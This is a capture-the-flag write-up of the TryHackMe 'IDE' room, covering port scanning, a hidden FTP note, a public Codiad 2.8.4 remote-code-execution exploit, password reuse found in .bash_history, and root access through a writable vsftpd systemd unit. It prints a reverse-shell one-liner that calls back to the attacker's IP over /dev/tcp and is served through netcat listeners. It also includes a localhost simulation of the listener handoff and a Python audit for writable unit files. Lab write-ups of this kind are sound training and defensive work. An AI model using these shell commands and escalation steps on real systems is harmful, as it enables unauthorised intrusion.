IDE

Penthos
Oct 17, 2021

Room Link: https://tryhackme.com/room/ide

Enumeration

Nmap

PORT      STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.153.120
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
| 256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
|_ 256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
62337/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B4A327D2242C42CF2EE89C623279665F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Codiad 2.8.4

FTP

Anonymous login is allowed and a plain ls shows nothing. This is not really a path traversal bypass, though: the room hides a directory named ... with a file named - inside it, and vsftpd, like most FTP servers, leaves dot-prefixed names out of a default listing (ls -a asks for them). Knowing the path, the file can be pulled directly:

ftp> get /.../- file
local: file remote: /.../-
227 Entering Passive Mode (10,10,124,141,155,242).
150 Opening BINARY mode data connection for /.../- (151 bytes).
226 Transfer complete.
151 bytes received in 0.00 secs (3.2001 MB/s)
$ cat file
Hey john,
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
- drac.

We will keep that in mind for later.

Port 62337

Codiad

Possible exploits (both need valid Codiad credentials, which is where the FTP note comes in: the user is john and the password was reset to the default):

https://packetstormsecurity.com/files/162772/Codiad-2.8.4-Shell-Upload.html
https://packetstormsecurity.com/files/161944/Codiad-2.8.4-Remote-Code-Execution.html

Codiad install

CODIAD INSTALLATION
----------------------------------------------------------------------
To install simply place the contents of the system in a web accessible
folder.
Ensure that the following have write capabilities: /config.php
/data
/workspace

Navigate in your browser to the URL where the system is placed and the
installer screen will appear. If any dependencies have not been met the
system will alert you.
Enter the requested information to create a user account, project, and
set your timezone and submit the form. If everything goes as planned
you will be greeted with a login screen.
Happy coding!

RCE

https://packetstormsecurity.com/files/161944/Codiad-2.8.4-Remote-Code-Execution.html

I modified the script a bit: the y/n prompt was broken, so I removed it and just made sure I had both commands running as in the script.

The commands, run in three separate windows: the first listener serves the reverse-shell one-liner to the target when the exploit makes it call back, the second catches the shell that one-liner spawns, and the third is the exploit itself (see images 1, 2, 3). The one-liner sits inside single quotes, so its inner double quotes need no backslashes; 9999 is the callback port passed to the exploit, so that is where the first listener must sit, and PORT2 is any other free port on the attacking box.

echo 'bash -c "bash -i >/dev/tcp/10.8.153.120/PORT2 0>&1 2>&1"' | nc -lnvp 9999
nc -lnvp PORT2
python payload.py http://10.10.124.141:62337/ john password 10.8.153.120 9999 linux
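Why two listeners? As an added example (not part of the original writeup or of the exploit's code), this Python script replays the handoff on localhost: stage one plays the echo-into-nc listener and hands over the reverse-shell one-liner, a simulated target connects to it, reads the command and, instead of running bash, connects to the second listener the way bash -i >/dev/tcp/... would, and stage two catches that connection. The addresses, ports and the prompt string are constructed; nothing is executed.

```python
import socket
import threading

# Constructed stand-in for the two-listener handoff: everything runs on localhost
# and the "target" only parses the command it is handed, nothing is executed.
ATTACKER = "127.0.0.1"


def reverse_shell_command(ip, port):
    """The one-liner stage one hands to the target. The inner double quotes are
    literal characters of the command, which is why the real `echo` wraps the
    whole thing in single quotes."""
    return f'bash -c "bash -i >/dev/tcp/{ip}/{port} 0>&1 2>&1"'


def listen(port=0):
    """Bind a listener (port 0 = let the OS pick, so the demo never collides)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((ATTACKER, port))
    srv.listen(1)
    srv.settimeout(10)  # accept() must not hang forever if the handoff breaks
    return srv


def stage_one(srv, command, result):
    """echo '<command>' | nc -lnvp PORT1: accept once, push the command, close."""
    conn, _ = srv.accept()
    with conn:
        conn.sendall(command.encode() + b"\n")
    result["stage1_sent"] = command


def stage_two(srv, result):
    """nc -lnvp PORT2: read whatever the target's shell sends until it hangs up."""
    conn, _ = srv.accept()
    data = b""
    with conn:
        while chunk := conn.recv(4096):
            data += chunk
    result["stage2_received"] = data.decode()


def simulated_target(stage1_port):
    """Stand-in for the Codiad host. The exploit makes it fetch a command from
    stage one and feed it to bash; here we parse the command instead of
    executing it, then connect where `bash -i` would have connected."""
    with socket.create_connection((ATTACKER, stage1_port)) as c, c.makefile() as f:
        cmd = f.readline().strip()
    marker = "/dev/tcp/"
    hostport = cmd[cmd.index(marker) + len(marker):].split()[0]
    host, port = hostport.rsplit("/", 1)
    with socket.create_connection((host, int(port))) as shell:
        shell.sendall(b"www-data@ide:/$ ")  # constructed prompt instead of a real shell
    return host, int(port)


def run_handoff():
    """Wire the three pieces together and report what each side saw."""
    s1, s2 = listen(), listen()
    p1, p2 = s1.getsockname()[1], s2.getsockname()[1]
    result = {"ports": (p1, p2)}
    threads = [
        threading.Thread(target=stage_one, args=(s1, reverse_shell_command(ATTACKER, p2), result)),
        threading.Thread(target=stage_two, args=(s2, result)),
    ]
    for t in threads:
        t.start()
    result["target_called_back_to"] = simulated_target(p1)
    for t in threads:
        t.join()
    s1.close()
    s2.close()
    return result


if __name__ == "__main__":
    for key, value in run_handoff().items():
        print(f"{key}: {value}")
```

The point to take away is that the port given to the exploit is only the stage-one port; the shell itself arrives on whatever port the one-liner names, so the two must differ and both listeners must be up before the exploit runs.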

Looking in drac's home directory, the .bash_history holds a secret: a MySQL password typed straight on the command line.

cat drac/.bash_history 
mysql -u drac -p '<REDACTED>'

User

The MySQL password is reused for the system account:

su drac
<REDACTED>

Root

sudo -l

User drac may run the following commands on ide:
    (ALL : ALL) /usr/sbin/service vsftpd restart

drac can restart vsftpd as root, and the unit behind that service, /etc/systemd/system/multi-user.target.wants/vsftpd.service, can be edited by drac (confirm with ls -l before touching it). Whatever ExecStart in that unit points at runs as root when the service starts, so swap it for a command of your choosing, tell systemd to re-read the unit, then use the sudo rule to restart the service:

systemctl daemon-reload
sudo /usr/sbin/service vsftpd restart
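The sudo rule is harmless only as long as nothing the service runs can be changed by drac. As an added example (not part of the writeup), this Python audit takes sudo -l output and a unit file and reports whether the unit itself, or any binary its Exec* lines launch, is writable by a given uid. It uses the mode bits rather than os.access so the answer is about drac even when you run it as someone else. The sudo output is copied from above; the unit text is constructed in the shape of Ubuntu's stock vsftpd.service, and the world-writable mode in demo() stands in for whatever permission let drac edit the file on the box.

```python
import os
import re
import stat
import tempfile

# Constructed copy of the sudo -l output from the box.
SUDO_L = """User drac may run the following commands on ide:
    (ALL : ALL) /usr/sbin/service vsftpd restart
"""

# Constructed unit file in the shape of Ubuntu's stock vsftpd.service; the real
# unit on the box is assumed to look like this.
UNIT = """[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target
"""

SERVICE_RE = re.compile(r"(?:/usr/sbin/|/sbin/)?service\s+(\S+)\s+(?:re)?start\b")
SYSTEMCTL_RE = re.compile(r"systemctl\s+(?:re)?start\s+(\S+)")
EXEC_RE = re.compile(r"^Exec\w*=[-@+!:]*(\S+)", re.M)


def restartable_services(sudo_l):
    """Service names the user may (re)start through sudo, from `sudo -l` output."""
    found = []
    for line in sudo_l.splitlines():
        line = line.strip()
        if not line.startswith("("):  # only the rule lines, not the banner
            continue
        for rx in (SERVICE_RE, SYSTEMCTL_RE):
            m = rx.search(line)
            if m:
                found.append(m.group(1).removesuffix(".service"))
    return found


def exec_paths(unit_text):
    """Binaries launched by Exec* directives (systemd prefix chars like '-' stripped)."""
    return EXEC_RE.findall(unit_text)


def writable_by(path, uid, gids):
    """Mode-bit check for a specific user (unlike os.access, the result does not
    depend on who runs this script). Missing files count as not writable."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit(sudo_l, unit_path, uid, gids=()):
    """Is a sudo 'service X restart' rule escalatable for this user? It is if the
    unit file, or anything its Exec* lines run, can be rewritten by the user."""
    with open(unit_path) as f:
        unit = f.read()
    return {
        "services": restartable_services(sudo_l),
        "unit_writable": writable_by(unit_path, uid, gids),
        "writable_exec": [p for p in exec_paths(unit) if writable_by(p, uid, gids)],
    }


def demo():
    """Audit a temp copy of the unit twice: with the proper root-style 0644 mode,
    then world-writable as a constructed stand-in for the misconfiguration."""
    path = os.path.join(tempfile.mkdtemp(), "vsftpd.service")
    with open(path, "w") as f:
        f.write(UNIT)
    not_owner = os.stat(path).st_uid + 1  # a uid other than the file's owner
    os.chmod(path, 0o644)
    hardened = audit(SUDO_L, path, not_owner)
    os.chmod(path, 0o666)
    weak = audit(SUDO_L, path, not_owner)
    return hardened, weak


if __name__ == "__main__":
    for label, report in zip(("0644", "0666"), demo()):
        print(label, report)
```

The fix is the same check run in reverse: unit files under /etc/systemd/system and every binary they launch should be owned by root and not writable by anyone else, or a restart-only sudo rule becomes a root shell.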

Box Complete!
